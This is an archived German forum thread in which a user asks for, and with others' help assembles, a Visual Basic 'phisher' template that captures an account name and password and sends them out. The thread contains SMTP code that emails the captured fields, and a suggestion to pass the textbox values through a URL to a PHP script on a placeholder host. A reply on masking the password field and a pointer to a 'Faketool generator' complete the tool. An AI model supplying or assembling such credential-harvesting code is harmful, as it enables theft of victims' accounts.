PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [S] Phisher Vorlage



VorTex
18.08.2010, 17:20
Würde mich freuen, wenn mir jemand ne Visual Basic Datei hochladen könnte, bei der zwei Felder Accountname und Passwortfeld per Email versendet werden können, so dass ich mich nurnoch ums Design kümmern muss und meine Email Adresse da eintrage.

Habe bereits gesucht, aber nur einen Script gefunden, bei dem Fehlercodes drinn stecken und ich selbst habe da nicht soviel Ahnung von um das großartig zu korrigieren.

Dankeschön ! :)

SFX
18.08.2010, 17:45
Du bekommst es tatsächlich nicht hin ein paar Buttons zusammen zu ziehen, die Events zusammen zu klicken und zu googeln wie man Emails verschickt o.O ?

VorTex
18.08.2010, 17:50
Du bekommst es tatsächlich nicht hin ein paar Buttons zusammen zu ziehen, die Events zusammen zu klicken und zu googeln wie man Emails verschickt o.O ?

Hab jetzt schon 3 Youtube Tuts durch und immer sind da irgendwo fehler drinn zeigt mir das programm an und verbunden hab ich die felder mit dem script aber will nich so recht ^^

Deswegen brauch ich ja ganz dringeng hilfe :D

cr0ssdomi
18.08.2010, 17:51
Ich wills dir nich zu einfach machen ein bisschen musst du auch nachdenken also hier:


' Wichtig! GLEICH zu BEGINN einfügen,
' also noch VOR Public Class ...
Imports System.Web.Mail

Public Class Form1
Inherits System.Windows.Forms.Form

Private Sub Button1_Click(ByVal sender As System.Object, _
ByVal e As System.EventArgs) Handles Button1.Click

Dim oMail As New MailMessage()

' SMTP-Server (z.B. T-Online)
SmtpMail.SmtpServer = "SMTP SERVER"

With oMail
' Absender
.From = "Ihre EMail-Adresse"

' Empfänger
.To = "Empfänger EMail-Adresse"

' Betreff
.Subject = "Test-Nachricht"

' Nachricht
.Body = "Dies ist eine Test-Nachricht"

' Anlagen?
' .Attachments.Add(New MailAttachment("Dateiname"))
End With

Try
SmtpMail.Send(oMail)
MsgBox("Nachricht wurde versandt.")

Catch oEx As Exception
MsgBox("Fehler: " & oEx.Message.ToString)

End Try
End Sub
End Class

Quelle: Google einfach mal richtig -.- (http://www.vbarchiv.net/tipps/details.php?id=804)

hackerking
18.08.2010, 17:58
Vote4Close
Lerne erstmal die Basics anstatt nur C&P
Und zu YouTube:
Also wenn du das nicht schaffst, du kriegst auf YouTube reine C&P Vorlagen..

100
18.08.2010, 18:04
Der Thread wird geclosed, da Anfragen auf komplette Sourcecodes verboten sind.

Aber bis dahin:
EMail Versand ist blöd, mach das ganze über ein PHP Script. Mit der Inet Komponente (Microsoft Internet Controls; Strg+T) kannst du das php Script dann so aufrufen:
Inet1.Navigate "http://blablabla.de/script.php?variable1=" & Text1.Text & "&variable2=" & Text2.Text ..

Wie du das mit dem php Script machst musst du selber herausfinden. Ich kann mich daran erinnern, dass ich das erst gestern nochmal gepostet hatte.

VorTex
18.08.2010, 18:11
Ich komm grad ganz gut voran also ich habe jetzt



Dim text As String
text = TextBox1.Text & TextBox2.Text + vbLf
Dim myClient As New Net.Mail.SmtpClient("smtp.web.de")
myClient.Credentials = New NetworkCredential("Emailadresse", "Password")
myClient.Send("EmailAdresse", "EmailAdresse, EmailAdresse", "Betreff", text)


Scheint sogar zu funktionieren, wie kann ich das jetzt aber noch einstellen, dass es bei der Email mit Absatz ankommt? Weil momentan werden Username und Passwort zusammengeschrieben ..

Achja und was muss ich machen, damit im Passwortfeld Sternchen angezeigt werden ?

cr0ssdomi
18.08.2010, 18:14
du bist anscheinend noch ein VB Anfänger oda??

ich würde dir raten, dich erstmal hinzusetzen und dich etwas mit vb zu beschäftigen bevor du richtig anfängst zu coden.

außerdem kannst du einfach den Faketool generator benutzen
SuFu

mfg

cr0ssfreak

100
18.08.2010, 18:18
Achja und was muss ich machen, damit im Passwortfeld Sternchen angezeigt werden ?

Text1.PasswordChar = "*"